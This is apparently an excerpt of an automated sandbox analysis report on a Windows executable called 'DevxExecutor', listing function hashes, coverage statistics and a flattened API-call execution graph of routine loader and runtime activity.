                                                                                                                                                            Function 00007FF848F004B0 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0c33be56bdf261108ddbb4c397669430fde631d0eb4ada8935427aaaa1c56d82
                                                                                                                                                            • Instruction ID: 7121857f9119318d2754153781a79e00213308427b7b920a7ebea845db2d1cfe
                                                                                                                                                            • Opcode Fuzzy Hash: 0c33be56bdf261108ddbb4c397669430fde631d0eb4ada8935427aaaa1c56d82
                                                                                                                                                            • Instruction Fuzzy Hash: B8F0C822F1DD091FF7A8BA6D28997B993D1EBED291B510179E00DC32CAFD185C828354
                                                                                                                                                            Function 00007FF848F00A81 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 93a319f2945d4d4ba3e23f725a26caea31f57afc14414f232302e1898f92d310
                                                                                                                                                            • Instruction ID: 107b124f9b5842f9ec9117c12ca14d67a02ba44164ccb4b40e4bbfcb8332e439
                                                                                                                                                            • Opcode Fuzzy Hash: 93a319f2945d4d4ba3e23f725a26caea31f57afc14414f232302e1898f92d310
                                                                                                                                                            • Instruction Fuzzy Hash: C6F02D31E0CB414FE395B72888565797BE1EF96350F4905BAD848C71E6FE1C99854341

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:1.8%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:10.2%
                                                                                                                                                            Signature Coverage:5.4%
                                                                                                                                                            Total number of Nodes:900
                                                                                                                                                            Total number of Limit Nodes:42
                                                                                                                                                            execution_graph 87717 271dc6728c8 87718 271dc67290e 87717->87718 87719 271dc672970 87718->87719 87721 271dc673844 87718->87721 87722 271dc673851 StrCmpNIW 87721->87722 87723 271dc673866 87721->87723 87722->87723 87723->87718 87724 7ff6957fa715 87736 7ff6957fb188 87724->87736 87726 7ff6957fa71a 87727 7ff6957fa741 GetModuleHandleW 87726->87727 87728 7ff6957fa78b 87726->87728 87727->87728 87730 7ff6957fa74e 87727->87730 87729 7ff6957fa618 11 API calls 87728->87729 87731 7ff6957fa7c7 87729->87731 87730->87728 87735 7ff6957fa83c GetModuleHandleExW GetProcAddress FreeLibrary 87730->87735 87732 7ff6957fa7ce 87731->87732 87733 7ff6957fa7e4 11 API calls 87731->87733 87734 7ff6957fa7e0 87733->87734 87735->87728 87741 7ff6957fbf00 45 API calls 3 library calls 87736->87741 87738 7ff6957fb191 87742 7ff6957fb2bc 45 API calls 2 library calls 87738->87742 87741->87738 87743 7ff8a48ff8d0 GetSystemInfo 87744 7ff8a48ff904 87743->87744 87745 7ff6957e2310 87746 7ff6957e238b GetWindowLongPtrW 87745->87746 87747 7ff6957e2325 87745->87747 87755 7ff6957e23d0 GetDC 87746->87755 87749 7ff6957e2332 87747->87749 87750 7ff6957e235a SetWindowLongPtrW 87747->87750 87751 7ff6957e2344 EndDialog 87749->87751 87753 7ff6957e234a 87749->87753 87754 7ff6957e2374 87750->87754 87751->87753 87756 7ff6957e249d 87755->87756 87757 7ff6957e240d 87755->87757 87758 7ff6957e24a2 MoveWindow MoveWindow MoveWindow MoveWindow 87756->87758 87759 7ff6957e243f SelectObject 87757->87759 87760 7ff6957e244b DrawTextW 87757->87760 87765 7ff6957ec010 87758->87765 87759->87760 87762 7ff6957e2475 SelectObject 87760->87762 87763 7ff6957e2481 ReleaseDC 87760->87763 87762->87763 87763->87758 87766 7ff6957ec019 87765->87766 87767 7ff6957e23a8 InvalidateRect 87766->87767 87768 7ff6957ec070 IsProcessorFeaturePresent 87766->87768 87767->87753 87769 7ff6957ec088 87768->87769 87774 7ff6957ec264 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 87769->87774 87771 7ff6957ec09b 87775 7ff6957ec030 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 87771->87775 87774->87771 87776 7ff6957ec3cc 87797 7ff6957ec59c 87776->87797 87779 7ff6957ec518 87895 7ff6957ec8bc 7 API calls 2 library calls 87779->87895 87780 7ff6957ec3e8 __scrt_acquire_startup_lock 87782 7ff6957ec522 87780->87782 87787 7ff6957ec406 __scrt_release_startup_lock 87780->87787 87896 7ff6957ec8bc 7 API calls 2 library calls 87782->87896 87784 7ff6957ec42b 87785 7ff6957ec52d __CxxCallCatchBlock 87786 7ff6957ec4b1 87803 7ff6957eca04 87786->87803 87787->87784 87787->87786 87892 7ff6957fa8e0 45 API calls 87787->87892 87789 7ff6957ec4b6 87806 7ff6957e1000 87789->87806 87794 7ff6957ec4d9 87794->87785 87894 7ff6957ec720 7 API calls 87794->87894 87796 7ff6957ec4f0 87796->87784 87798 7ff6957ec5a4 87797->87798 87799 7ff6957ec5b0 __scrt_dllmain_crt_thread_attach 87798->87799 87800 7ff6957ec5bd 87799->87800 87802 7ff6957ec3e0 87799->87802 87800->87802 87897 7ff6957ed1c0 7 API calls 2 library calls 87800->87897 87802->87779 87802->87780 87898 7ff69580b580 87803->87898 87807 7ff6957e100b 87806->87807 87900 7ff6957e89b0 87807->87900 87809 7ff6957e101d 87907 7ff6957f66e8 87809->87907 87811 7ff6957e39ab 87914 7ff6957e1ea0 87811->87914 87815 7ff6957ec010 _wfindfirst32i64 8 API calls 87816 7ff6957e3b73 87815->87816 87893 7ff6957eca48 GetModuleHandleW 87816->87893 87817 7ff6957e39ca 87844 7ff6957e3ab2 87817->87844 87939 7ff6957e7d70 87817->87939 87819 7ff6957e39ff 87821 7ff6957e7d70 61 API calls 87819->87821 87832 7ff6957e3a4b 87819->87832 87825 7ff6957e3a20 __std_exception_destroy 87821->87825 87822 7ff6957e3a60 87958 7ff6957e1ca0 87822->87958 87828 7ff6957e8250 58 API calls 87825->87828 87825->87832 87826 7ff6957e3b2d 87850 7ff6957e3b8d 87826->87850 88061 7ff6957e8b80 69 API calls _wfindfirst32i64 87826->88061 87827 7ff6957e1ca0 121 API calls 87829 7ff6957e3a96 87827->87829 87828->87832 87833 7ff6957e3a9a 87829->87833 87834 7ff6957e3ab7 87829->87834 87954 7ff6957e8250 87832->87954 88036 7ff6957e2b10 59 API calls 2 library calls 87833->88036 87834->87826 88037 7ff6957e4060 87834->88037 87835 7ff6957e3bdb 87991 7ff6957e6ff0 87835->87991 87836 7ff6957e3bc0 87841 7ff6957e3b53 87836->87841 87842 7ff6957e3bce SetDllDirectoryW 87836->87842 87837 7ff6957e3b4e 87837->87841 88063 7ff6957e14e0 91 API calls 87837->88063 88062 7ff6957e2b10 59 API calls 2 library calls 87841->88062 87842->87835 87844->87815 87847 7ff6957e3ad5 88060 7ff6957e2b10 59 API calls 2 library calls 87847->88060 87850->87835 87850->87844 87977 7ff6957e8de0 87850->87977 87852 7ff6957e3bf5 87879 7ff6957e3c27 87852->87879 88065 7ff6957e6800 135 API calls 3 library calls 87852->88065 87853 7ff6957e3b03 87853->87826 87856 7ff6957e3b08 87853->87856 87854 7ff6957e3d11 88029 7ff6957e34a0 87854->88029 88056 7ff6957f097c 87856->88056 87861 7ff6957e3c06 87863 7ff6957e3c29 87861->87863 88066 7ff6957e6780 91 API calls 87861->88066 87862 7ff6957e3d26 88074 7ff6957e8b50 LocalFree 87862->88074 88068 7ff6957e6a50 FreeLibrary 87863->88068 87864 7ff6957e3c46 87873 7ff6957e3c88 87864->87873 88069 7ff6957e1ee0 87864->88069 87866 7ff6957e3cdc 87995 7ff6957e3440 87866->87995 87867 7ff6957e3cb9 PostMessageW GetMessageW 87867->87866 87871 7ff6957e3d2b 88075 7ff6957e81e0 57 API calls __std_exception_destroy 87871->88075 87872 7ff6957e3c14 87872->87863 87874 7ff6957e3c18 87872->87874 87873->87844 87873->87866 87873->87867 88067 7ff6957e6e40 60 API calls 87874->88067 87877 7ff6957e3d3e 87881 7ff6957e7d70 61 API calls 87877->87881 87879->87854 87879->87864 87880 7ff6957e3cec 88073 7ff6957e6a50 FreeLibrary 87880->88073 87882 7ff6957e3d4a 87881->87882 87884 7ff6957e3d7a 87882->87884 87885 7ff6957e3d57 PostMessageW GetMessageW 87882->87885 88076 7ff6957e8290 63 API calls 2 library calls 87884->88076 87885->87884 87887 7ff6957e3d8d 88077 7ff6957e6a50 FreeLibrary 87887->88077 87889 7ff6957e3d99 87890 7ff6957e3db8 87889->87890 88078 7ff6957e7f50 67 API calls 2 library calls 87889->88078 87890->87844 87892->87786 87893->87794 87894->87796 87895->87782 87896->87785 87897->87802 87899 7ff6957eca1b GetStartupInfoW 87898->87899 87899->87789 87902 7ff6957e89cf 87900->87902 87901 7ff6957e8a20 WideCharToMultiByte 87901->87902 87905 7ff6957e8ac6 87901->87905 87902->87901 87904 7ff6957e8a74 WideCharToMultiByte 87902->87904 87902->87905 87906 7ff6957e89d7 __std_exception_destroy 87902->87906 87904->87902 87904->87905 88079 7ff6957e29c0 57 API calls 2 library calls 87905->88079 87906->87809 87908 7ff695800840 87907->87908 87910 7ff6958008e6 87908->87910 87911 7ff695800893 87908->87911 88081 7ff695800718 71 API calls _fread_nolock 87910->88081 88080 7ff6957fb5cc 37 API calls 2 library calls 87911->88080 87913 7ff6958008bc 87913->87811 87915 7ff6957e1eb5 87914->87915 87916 7ff6957e1ed0 87915->87916 88082 7ff6957e2870 59 API calls 3 library calls 87915->88082 87916->87844 87918 7ff6957e3f00 87916->87918 88083 7ff6957ebfb0 87918->88083 87921 7ff6957e3f55 88085 7ff6957e8ef0 87921->88085 87922 7ff6957e3f3e 88104 7ff6957e29c0 57 API calls 2 library calls 87922->88104 87925 7ff6957e3f51 87929 7ff6957ec010 _wfindfirst32i64 8 API calls 87925->87929 87927 7ff6957e3f80 88096 7ff6957e40e0 87927->88096 87928 7ff6957e3f70 88105 7ff6957e2b10 59 API calls 2 library calls 87928->88105 87932 7ff6957e3fd9 87929->87932 87932->87817 87934 7ff6957e1ee0 49 API calls 87935 7ff6957e3fa5 87934->87935 87935->87925 87936 7ff6957e3fac 87935->87936 88106 7ff6957e4340 62 API calls 2 library calls 87936->88106 87938 7ff6957e3fb9 87938->87925 87940 7ff6957e7d7a 87939->87940 87941 7ff6957e8de0 57 API calls 87940->87941 87942 7ff6957e7d9c GetEnvironmentVariableW 87941->87942 87943 7ff6957e7db4 ExpandEnvironmentStringsW 87942->87943 87944 7ff6957e7e06 87942->87944 87946 7ff6957e8ef0 59 API calls 87943->87946 87945 7ff6957ec010 _wfindfirst32i64 8 API calls 87944->87945 87947 7ff6957e7e18 87945->87947 87948 7ff6957e7ddc 87946->87948 87947->87819 87948->87944 87949 7ff6957e7de6 87948->87949 88115 7ff6957fb1bc 37 API calls 2 library calls 87949->88115 87951 7ff6957e7dee 87952 7ff6957ec010 _wfindfirst32i64 8 API calls 87951->87952 87953 7ff6957e7dfe 87952->87953 87953->87819 87955 7ff6957e8de0 57 API calls 87954->87955 87956 7ff6957e8267 SetEnvironmentVariableW 87955->87956 87957 7ff6957e827f __std_exception_destroy 87956->87957 87957->87822 87959 7ff6957e1cae 87958->87959 87960 7ff6957e1ee0 49 API calls 87959->87960 87961 7ff6957e1ce4 87960->87961 87962 7ff6957e1ee0 49 API calls 87961->87962 87972 7ff6957e1dce 87961->87972 87963 7ff6957e1d0a 87962->87963 87963->87972 88116 7ff6957e1a90 87963->88116 87964 7ff6957ec010 _wfindfirst32i64 8 API calls 87965 7ff6957e1e5c 87964->87965 87965->87826 87965->87827 87969 7ff6957e1dbc 88150 7ff6957e3e80 49 API calls 87969->88150 87971 7ff6957e1d7f 87971->87969 87973 7ff6957e1e24 87971->87973 87972->87964 88151 7ff6957e3e80 49 API calls 87973->88151 87975 7ff6957e1e31 88152 7ff6957e4140 87975->88152 87978 7ff6957e8e01 MultiByteToWideChar 87977->87978 87979 7ff6957e8e87 MultiByteToWideChar 87977->87979 87982 7ff6957e8e4c 87978->87982 87983 7ff6957e8e27 87978->87983 87980 7ff6957e8ecf 87979->87980 87981 7ff6957e8eaa 87979->87981 87980->87836 88199 7ff6957e29c0 57 API calls 2 library calls 87981->88199 87982->87979 87988 7ff6957e8e62 87982->87988 88197 7ff6957e29c0 57 API calls 2 library calls 87983->88197 87986 7ff6957e8ebd 87986->87836 87987 7ff6957e8e3a 87987->87836 88198 7ff6957e29c0 57 API calls 2 library calls 87988->88198 87990 7ff6957e8e75 87990->87836 87993 7ff6957e7005 87991->87993 87992 7ff6957e3be0 87992->87879 88064 7ff6957e6ca0 122 API calls 2 library calls 87992->88064 87993->87992 88200 7ff6957e2870 59 API calls 3 library calls 87993->88200 88201 7ff6957e5dd0 87995->88201 87998 7ff6957e348d 87998->87880 88000 7ff6957e3464 88000->87998 88270 7ff6957e5b30 88000->88270 88002 7ff6957e3470 88002->87998 88279 7ff6957e5ca0 88002->88279 88004 7ff6957e347c 88004->87998 88005 7ff6957e366c 88004->88005 88006 7ff6957e3657 88004->88006 88008 7ff6957e368c 88005->88008 88018 7ff6957e36a2 __std_exception_destroy 88005->88018 88323 7ff6957e2b10 59 API calls 2 library calls 88006->88323 88324 7ff6957e2b10 59 API calls 2 library calls 88008->88324 88010 7ff6957ec010 _wfindfirst32i64 8 API calls 88011 7ff6957e37fa 88010->88011 88011->87880 88013 7ff6957e1ee0 49 API calls 88013->88018 88014 7ff6957e393b 88328 7ff6957e2b10 59 API calls 2 library calls 88014->88328 88016 7ff6957e3915 88327 7ff6957e2b10 59 API calls 2 library calls 88016->88327 88018->88013 88018->88014 88018->88016 88019 7ff6957e3806 88018->88019 88028 7ff6957e3663 __std_exception_destroy 88018->88028 88285 7ff6957e1590 88018->88285 88021 7ff6957e3872 88019->88021 88325 7ff6957fb1bc 37 API calls 2 library calls 88019->88325 88022 7ff6957e38a7 88021->88022 88023 7ff6957e3899 88021->88023 88309 7ff6957e3230 88022->88309 88326 7ff6957fb1bc 37 API calls 2 library calls 88023->88326 88026 7ff6957e38a5 88313 7ff6957e2750 88026->88313 88028->88010 88030 7ff6957e3554 88029->88030 88034 7ff6957e3513 88029->88034 88031 7ff6957ec010 _wfindfirst32i64 8 API calls 88030->88031 88032 7ff6957e35a5 88031->88032 88032->87844 88032->87862 88034->88030 88501 7ff6957e2d50 88034->88501 88552 7ff6957e1700 135 API calls 2 library calls 88034->88552 88036->87844 88038 7ff6957e406c 88037->88038 88039 7ff6957e8de0 57 API calls 88038->88039 88040 7ff6957e4097 88039->88040 88041 7ff6957e8de0 57 API calls 88040->88041 88042 7ff6957e40aa 88041->88042 88649 7ff6957f69e4 88042->88649 88045 7ff6957ec010 _wfindfirst32i64 8 API calls 88046 7ff6957e3acd 88045->88046 88046->87847 88047 7ff6957e84c0 88046->88047 88048 7ff6957e84e4 88047->88048 88049 7ff6957f1004 73 API calls 88048->88049 88050 7ff6957e85bb __std_exception_destroy 88048->88050 88051 7ff6957e84fe 88049->88051 88050->87853 88051->88050 88817 7ff6957f9894 88051->88817 88053 7ff6957f1004 73 API calls 88055 7ff6957e8513 88053->88055 88054 7ff6957f0ccc _fread_nolock 53 API calls 88054->88055 88055->88050 88055->88053 88055->88054 88057 7ff6957f09ac 88056->88057 88833 7ff6957f0758 88057->88833 88059 7ff6957f09c5 88059->87847 88060->87844 88061->87837 88062->87844 88063->87850 88064->87852 88065->87861 88066->87872 88067->87879 88068->87879 88070 7ff6957e1f05 88069->88070 88071 7ff6957f52b4 49 API calls 88070->88071 88072 7ff6957e1f28 88071->88072 88072->87873 88073->87844 88074->87871 88075->87877 88076->87887 88077->87889 88078->87890 88079->87906 88080->87913 88081->87913 88082->87916 88084 7ff6957e3f0c GetModuleFileNameW 88083->88084 88084->87921 88084->87922 88086 7ff6957e8f14 WideCharToMultiByte 88085->88086 88087 7ff6957e8f82 WideCharToMultiByte 88085->88087 88090 7ff6957e8f55 88086->88090 88091 7ff6957e8f3e 88086->88091 88088 7ff6957e8faf 88087->88088 88089 7ff6957e3f6b 88087->88089 88109 7ff6957e29c0 57 API calls 2 library calls 88088->88109 88089->87927 88089->87928 88090->88087 88094 7ff6957e8f6b 88090->88094 88107 7ff6957e29c0 57 API calls 2 library calls 88091->88107 88108 7ff6957e29c0 57 API calls 2 library calls 88094->88108 88097 7ff6957e40ea 88096->88097 88098 7ff6957e8de0 57 API calls 88097->88098 88099 7ff6957e4112 88098->88099 88110 7ff6957e8d00 FindFirstFileExW 88099->88110 88102 7ff6957ec010 _wfindfirst32i64 8 API calls 88103 7ff6957e3f88 88102->88103 88103->87925 88103->87934 88104->87925 88105->87925 88106->87938 88107->88089 88108->88089 88109->88089 88111 7ff6957e8d50 88110->88111 88112 7ff6957e8d3d FindClose 88110->88112 88113 7ff6957ec010 _wfindfirst32i64 8 API calls 88111->88113 88112->88111 88114 7ff6957e411c 88113->88114 88114->88102 88115->87951 88117 7ff6957e4060 116 API calls 88116->88117 88118 7ff6957e1ac6 88117->88118 88120 7ff6957e84c0 83 API calls 88118->88120 88126 7ff6957e1c74 88118->88126 88119 7ff6957ec010 _wfindfirst32i64 8 API calls 88122 7ff6957e1c88 88119->88122 88121 7ff6957e1afe 88120->88121 88147 7ff6957e1b2f 88121->88147 88155 7ff6957f1004 88121->88155 88122->87972 88149 7ff6957e3e80 49 API calls 88122->88149 88124 7ff6957f097c 74 API calls 88124->88126 88125 7ff6957e1b18 88127 7ff6957e1b34 88125->88127 88128 7ff6957e1b1c 88125->88128 88126->88119 88159 7ff6957f0ccc 88127->88159 88162 7ff6957e2870 59 API calls 3 library calls 88128->88162 88132 7ff6957e1b4f 88163 7ff6957e2870 59 API calls 3 library calls 88132->88163 88133 7ff6957e1b67 88135 7ff6957f1004 73 API calls 88133->88135 88136 7ff6957e1bb4 88135->88136 88137 7ff6957e1bde 88136->88137 88138 7ff6957e1bc6 88136->88138 88140 7ff6957f0ccc _fread_nolock 53 API calls 88137->88140 88164 7ff6957e2870 59 API calls 3 library calls 88138->88164 88141 7ff6957e1bf3 88140->88141 88142 7ff6957e1c0e 88141->88142 88143 7ff6957e1bf9 88141->88143 88166 7ff6957f0a40 37 API calls 2 library calls 88142->88166 88165 7ff6957e2870 59 API calls 3 library calls 88143->88165 88146 7ff6957e1c22 88146->88147 88167 7ff6957e2b10 59 API calls 2 library calls 88146->88167 88147->88124 88149->87971 88150->87972 88151->87975 88153 7ff6957e1ee0 49 API calls 88152->88153 88154 7ff6957e4170 88153->88154 88154->87972 88156 7ff6957f1034 88155->88156 88168 7ff6957f0d94 88156->88168 88158 7ff6957f104d 88158->88125 88181 7ff6957f0cec 88159->88181 88162->88147 88163->88147 88164->88147 88165->88147 88166->88146 88167->88147 88169 7ff6957f0dfe 88168->88169 88170 7ff6957f0dbe 88168->88170 88169->88170 88171 7ff6957f0e0a 88169->88171 88180 7ff6957fb5cc 37 API calls 2 library calls 88170->88180 88179 7ff6957f5b5c EnterCriticalSection 88171->88179 88174 7ff6957f0de5 88174->88158 88175 7ff6957f0e0f 88176 7ff6957f0f18 71 API calls 88175->88176 88177 7ff6957f0e21 88176->88177 88178 7ff6957f5b68 _fread_nolock LeaveCriticalSection 88177->88178 88178->88174 88180->88174 88182 7ff6957f0d16 88181->88182 88193 7ff6957e1b49 88181->88193 88183 7ff6957f0d62 88182->88183 88187 7ff6957f0d25 memcpy_s 88182->88187 88182->88193 88194 7ff6957f5b5c EnterCriticalSection 88183->88194 88186 7ff6957f0d6a 88189 7ff6957f0a6c _fread_nolock 51 API calls 88186->88189 88195 7ff6957f5cb4 11 API calls _get_daylight 88187->88195 88188 7ff6957f0d3a 88196 7ff6957fb698 37 API calls _invalid_parameter_noinfo 88188->88196 88191 7ff6957f0d81 88189->88191 88192 7ff6957f5b68 _fread_nolock LeaveCriticalSection 88191->88192 88192->88193 88193->88132 88193->88133 88195->88188 88197->87987 88198->87990 88199->87986 88200->87992 88202 7ff6957e5de0 88201->88202 88203 7ff6957e1ee0 49 API calls 88202->88203 88204 7ff6957e5e12 88203->88204 88205 7ff6957e5e3b 88204->88205 88206 7ff6957e5e1b 88204->88206 88208 7ff6957e5e92 88205->88208 88210 7ff6957e4140 49 API calls 88205->88210 88339 7ff6957e2b10 59 API calls 2 library calls 88206->88339 88209 7ff6957e4140 49 API calls 88208->88209 88212 7ff6957e5eab 88209->88212 88211 7ff6957e5e5c 88210->88211 88213 7ff6957e5e7a 88211->88213 88340 7ff6957e2b10 59 API calls 2 library calls 88211->88340 88215 7ff6957e5ec9 88212->88215 88341 7ff6957e2b10 59 API calls 2 library calls 88212->88341 88329 7ff6957e3ff0 88213->88329 88214 7ff6957ec010 _wfindfirst32i64 8 API calls 88218 7ff6957e344e 88214->88218 88335 7ff6957e8470 88215->88335 88218->87998 88229 7ff6957e5f30 88218->88229 88222 7ff6957e5ed6 88223 7ff6957e5edb 88222->88223 88224 7ff6957e5efd 88222->88224 88342 7ff6957e29c0 57 API calls 2 library calls 88223->88342 88343 7ff6957e53f0 101 API calls 88224->88343 88227 7ff6957e8470 58 API calls 88227->88208 88228 7ff6957e5e31 88228->88214 88344 7ff6957e4ff0 88229->88344 88231 7ff6957e5f54 88232 7ff6957e5f6d 88231->88232 88233 7ff6957e5f5c 88231->88233 88351 7ff6957e4730 88232->88351 88380 7ff6957e2b10 59 API calls 2 library calls 88233->88380 88237 7ff6957e5f8a 88240 7ff6957e5f97 88237->88240 88241 7ff6957e5fa8 88237->88241 88238 7ff6957e5f79 88381 7ff6957e2b10 59 API calls 2 library calls 88238->88381 88382 7ff6957e2b10 59 API calls 2 library calls 88240->88382 88355 7ff6957e4a80 88241->88355 88242 7ff6957e5f68 88242->88000 88245 7ff6957e5fc3 88246 7ff6957e5fc7 88245->88246 88247 7ff6957e5fd8 88245->88247 88383 7ff6957e2b10 59 API calls 2 library calls 88246->88383 88249 7ff6957e5fe7 88247->88249 88250 7ff6957e5ff8 88247->88250 88384 7ff6957e2b10 59 API calls 2 library calls 88249->88384 88362 7ff6957e4950 88250->88362 88254 7ff6957e6007 88385 7ff6957e2b10 59 API calls 2 library calls 88254->88385 88255 7ff6957e6018 88376 7ff6957e47e0 88255->88376 88258 7ff6957e6023 88259 7ff6957e6027 88258->88259 88260 7ff6957e6038 88258->88260 88386 7ff6957e2b10 59 API calls 2 library calls 88259->88386 88262 7ff6957e6047 88260->88262 88264 7ff6957e6058 88260->88264 88387 7ff6957e2b10 59 API calls 2 library calls 88262->88387 88267 7ff6957e6082 88264->88267 88388 7ff6957f7d00 73 API calls 88264->88388 88266 7ff6957e6070 88389 7ff6957f7d00 73 API calls 88266->88389 88267->88242 88390 7ff6957e2b10 59 API calls 2 library calls 88267->88390 88271 7ff6957e5b47 88270->88271 88271->88271 88272 7ff6957e5b70 88271->88272 88275 7ff6957e5b87 __std_exception_destroy 88271->88275 88394 7ff6957e2b10 59 API calls 2 library calls 88272->88394 88274 7ff6957e5b7c 88274->88002 88276 7ff6957e1590 122 API calls 88275->88276 88278 7ff6957e5c75 88275->88278 88395 7ff6957e2b10 59 API calls 2 library calls 88275->88395 88276->88275 88278->88002 88280 7ff6957e5d8e 88279->88280 88281 7ff6957e5cc5 88279->88281 88280->88004 88281->88280 88282 7ff6957e5da5 88281->88282 88396 7ff6957e2b10 59 API calls 2 library calls 88281->88396 88397 7ff6957e2b10 59 API calls 2 library calls 88282->88397 88286 7ff6957e4060 116 API calls 88285->88286 88287 7ff6957e15b7 88286->88287 88288 7ff6957e15bf 88287->88288 88289 7ff6957e15e0 88287->88289 88416 7ff6957e2b10 59 API calls 2 library calls 88288->88416 88291 7ff6957f1004 73 API calls 88289->88291 88293 7ff6957e15f1 88291->88293 88292 7ff6957e15cf 88292->88018 88294 7ff6957e15f5 88293->88294 88295 7ff6957e1611 88293->88295 88417 7ff6957e2870 59 API calls 3 library calls 88294->88417 88297 7ff6957e1641 88295->88297 88298 7ff6957e1621 88295->88298 88300 7ff6957e1656 88297->88300 88305 7ff6957e166d 88297->88305 88418 7ff6957e2870 59 API calls 3 library calls 88298->88418 88398 7ff6957e1050 88300->88398 88301 7ff6957f097c 74 API calls 88303 7ff6957e16e7 88301->88303 88303->88018 88304 7ff6957f0ccc _fread_nolock 53 API calls 88304->88305 88305->88304 88306 7ff6957e16ae 88305->88306 88307 7ff6957e160c __std_exception_destroy 88305->88307 88419 7ff6957e2870 59 API calls 3 library calls 88306->88419 88307->88301 88311 7ff6957e3264 88309->88311 88310 7ff6957e33cf 88310->88026 88311->88310 88444 7ff6957fb1bc 37 API calls 2 library calls 88311->88444 88314 7ff6957e2789 88313->88314 88315 7ff6957e277c 88313->88315 88317 7ff6957e8de0 57 API calls 88314->88317 88318 7ff6957e279e 88314->88318 88316 7ff6957e8de0 57 API calls 88315->88316 88316->88314 88317->88318 88319 7ff6957e8de0 57 API calls 88318->88319 88321 7ff6957e27b3 88318->88321 88319->88321 88445 7ff6957e25e0 88321->88445 88322 7ff6957e27cf __std_exception_destroy 88322->88028 88323->88028 88324->88028 88325->88021 88326->88026 88327->88028 88328->88028 88330 7ff6957e3ffa 88329->88330 88331 7ff6957e8de0 57 API calls 88330->88331 88332 7ff6957e4022 88331->88332 88333 7ff6957ec010 _wfindfirst32i64 8 API calls 88332->88333 88334 7ff6957e404a 88333->88334 88334->88208 88334->88227 88336 7ff6957e8de0 57 API calls 88335->88336 88337 7ff6957e8487 LoadLibraryW 88336->88337 88338 7ff6957e84a4 __std_exception_destroy 88337->88338 88338->88222 88339->88228 88340->88213 88341->88215 88342->88228 88343->88228 88346 7ff6957e5015 88344->88346 88345 7ff6957e501d 88345->88231 88346->88345 88347 7ff6957e51af 88346->88347 88391 7ff6957f74f4 48 API calls 88346->88391 88348 7ff6957e535a __std_exception_destroy 88347->88348 88349 7ff6957e4450 47 API calls 88347->88349 88348->88231 88349->88347 88352 7ff6957e4760 88351->88352 88353 7ff6957ec010 _wfindfirst32i64 8 API calls 88352->88353 88354 7ff6957e47ca 88353->88354 88354->88237 88354->88238 88356 7ff6957e4af1 88355->88356 88359 7ff6957e4a94 88355->88359 88393 7ff6957e45d0 57 API calls __std_exception_destroy 88356->88393 88358 7ff6957e4b01 88358->88245 88361 7ff6957e4adc 88359->88361 88392 7ff6957e45d0 57 API calls __std_exception_destroy 88359->88392 88361->88245 88363 7ff6957e4960 88362->88363 88364 7ff6957e1ee0 49 API calls 88363->88364 88365 7ff6957e49ac 88364->88365 88366 7ff6957e1ee0 49 API calls 88365->88366 88375 7ff6957e4a26 __std_exception_destroy 88365->88375 88367 7ff6957e49e7 88366->88367 88370 7ff6957e8de0 57 API calls 88367->88370 88367->88375 88368 7ff6957ec010 _wfindfirst32i64 8 API calls 88369 7ff6957e4a6d 88368->88369 88369->88254 88369->88255 88371 7ff6957e49fd 88370->88371 88372 7ff6957e8de0 57 API calls 88371->88372 88373 7ff6957e4a14 88372->88373 88374 7ff6957e8de0 57 API calls 88373->88374 88374->88375 88375->88368 88377 7ff6957e480a 88376->88377 88378 7ff6957e8de0 57 API calls 88377->88378 88379 7ff6957e4812 __std_exception_destroy 88377->88379 88378->88377 88379->88258 88380->88242 88381->88242 88382->88242 88383->88242 88384->88242 88385->88242 88386->88242 88387->88242 88388->88266 88389->88267 88390->88242 88391->88346 88392->88361 88393->88358 88394->88274 88395->88275 88396->88281 88397->88280 88399 7ff6957e10a6 88398->88399 88400 7ff6957e10d3 88399->88400 88401 7ff6957e10ad 88399->88401 88404 7ff6957e10ed 88400->88404 88405 7ff6957e1109 88400->88405 88424 7ff6957e2b10 59 API calls 2 library calls 88401->88424 88403 7ff6957e10c0 88403->88307 88425 7ff6957e2870 59 API calls 3 library calls 88404->88425 88407 7ff6957e111b 88405->88407 88414 7ff6957e1137 memcpy_s 88405->88414 88426 7ff6957e2870 59 API calls 3 library calls 88407->88426 88409 7ff6957f0ccc _fread_nolock 53 API calls 88409->88414 88410 7ff6957f0a40 37 API calls 88410->88414 88411 7ff6957e1104 __std_exception_destroy 88411->88307 88412 7ff6957e11fe 88427 7ff6957e2b10 59 API calls 2 library calls 88412->88427 88414->88409 88414->88410 88414->88411 88414->88412 88420 7ff6957f140c 88414->88420 88416->88292 88417->88307 88418->88307 88419->88307 88421 7ff6957f143c 88420->88421 88428 7ff6957f115c 88421->88428 88423 7ff6957f145a 88423->88414 88424->88403 88425->88411 88426->88411 88427->88411 88429 7ff6957f11a9 88428->88429 88430 7ff6957f117c 88428->88430 88429->88423 88430->88429 88431 7ff6957f11b1 88430->88431 88432 7ff6957f1186 88430->88432 88435 7ff6957f109c 88431->88435 88442 7ff6957fb5cc 37 API calls 2 library calls 88432->88442 88443 7ff6957f5b5c EnterCriticalSection 88435->88443 88437 7ff6957f10b9 88438 7ff6957f10dc 74 API calls 88437->88438 88439 7ff6957f10c2 88438->88439 88440 7ff6957f5b68 _fread_nolock LeaveCriticalSection 88439->88440 88441 7ff6957f10cd 88440->88441 88441->88429 88442->88429 88444->88310 88446 7ff6957ebfb0 88445->88446 88447 7ff6957e25f9 GetModuleHandleW 